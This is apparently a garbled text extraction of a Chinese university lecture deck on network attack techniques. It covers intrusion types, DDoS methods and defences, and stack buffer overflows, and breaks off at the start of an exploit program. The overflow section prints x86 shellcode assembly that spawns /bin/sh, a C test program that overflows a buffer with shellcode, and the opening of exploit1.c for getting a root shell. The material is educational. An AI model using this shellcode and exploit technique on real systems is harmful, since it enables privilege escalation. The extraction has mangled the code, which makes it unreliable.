网络攻击技术报告-北京大学计算机系信息安全研究室.pptVIP

网络攻击技术; 目录 ;网络攻击技术简介;攻击分类;攻击步骤与方法 ;入侵攻击;欺骗攻击;会话劫持攻击;缓冲区溢出攻击 ;保留访问权限;保留访问权限（续）;隐藏踪迹;隐藏踪迹（续） ; 目录 ;分布式拒绝服务攻击的实施及预防措施;DDoS的诞生;拒绝服务攻击;分布式拒绝服务攻击 ;分布式拒绝服务攻击特点;DDoS攻击过程;DDoS攻击的网络结构 ;DDoS所利用的协议漏洞;DDoS所利用的协议漏洞（续）.;DDoS攻击的五种常用方式;DDoS攻击的五种常用方式;DDoS攻击的五种常用方式;DDoS攻击的五种常用方式;DDoS攻击新技术——反弹技术;反弹技术原理;反弹技术实现DDoS攻击与传统DDoS攻击的区别：;DDoS攻击下的防御;DDoS攻击下的防御;网络流量的几种异常模式;网络流量的几种异常模式;网络监测工具的使用;拒绝服务监控系统的设计 ;拒绝服务监控系统的设计;拒绝服务监控系统的设计; 目录 ;缓冲区溢出攻击与防御;概念;原因;后果;缓冲区溢出攻击与防御;回顾C语言;一：指针型攻击方法;取得成功必须具备下列条件;攻击实施过程;二：数组型攻击方法;必须满足的条件;实施过程一;实施过程二;堆栈结构;看一段小程序;运行时的堆栈分配 ?;执行完gets(name)之后 ?;堆栈溢出 ?;如何书写一个shell code;加入系统调用exit;代码设计思路;jmp ???call的偏移地址 ??????????# 2 bytes ?popl ??esi ????????????????????# 1 byte ?????? ?//popl出来的是string的地址。 ?movl ?esi,array-offset(esi) ? #3bytes ?? ????//在string+8处构造 name数组， ?//name[0]放 string的地址 ?movb $0x0,nullbyteoffset(esi)# 4bytes //string+7处放0作为string的结尾。 ?movl ??$0x0,null-offset(esi) ??#7bytes ?????//name[1]放0。 ?movl ??$0xb,eax ???????????# 5bytes //eax=0xb是execve的syscall代码 ?movl ??esi,ebx ???????????????#2bytes ??? ???//ebx=string的地址 ?;leal ??array-offset,(esi),ecx # 3bytes //ecx=name数组的开始地址leal ??null-offset(esi),edx ??#3bytes //edx=name[1]的地址 ?int ???$0x80 ???????????????????# 2 bytes ???? ??//int 0x80是sys call ?movl ??$0x1, eax ??????????????# 5bytes //eax=0x1是exit的syscall代码 ?movl ??$0x0, ebx ??????????????# 5bytes //ebx=0是exit的返回值 ?int ???$0x80 ???????????????????# 2 bytes ???? ??//int 0x80是sys call ?call ??popl 的偏移地址 ?????????# 5 bytes ?? ???//这里放call,string的地址就会作为/bin/sh 字符串返回地址压栈 ? ;测试程序;char large_string[128]; ? ?void main() { ? ?char buffer[96]; ? ?int i; ? ?long *long_ptr = (long *)large_string; for (i = 0; i 32; i++) ? ???*(long_ptr + i) = (int) buffer; ? ??for (i = 0; i strlen(shellcode); i++) ? ???large_string[i] = shellcode[i]; ? ??strcpy(buffer,large_string); ?} ? ;在执行完strcpy后，堆栈内容如下所示： ?;利用别人的程序的堆栈溢出获得rootshell ;意味着…;但是;获得堆栈开始地址;开始猜;exploit1.c ?#includestdio.h ?#includestdlib.h ?#define OFFSET ???????????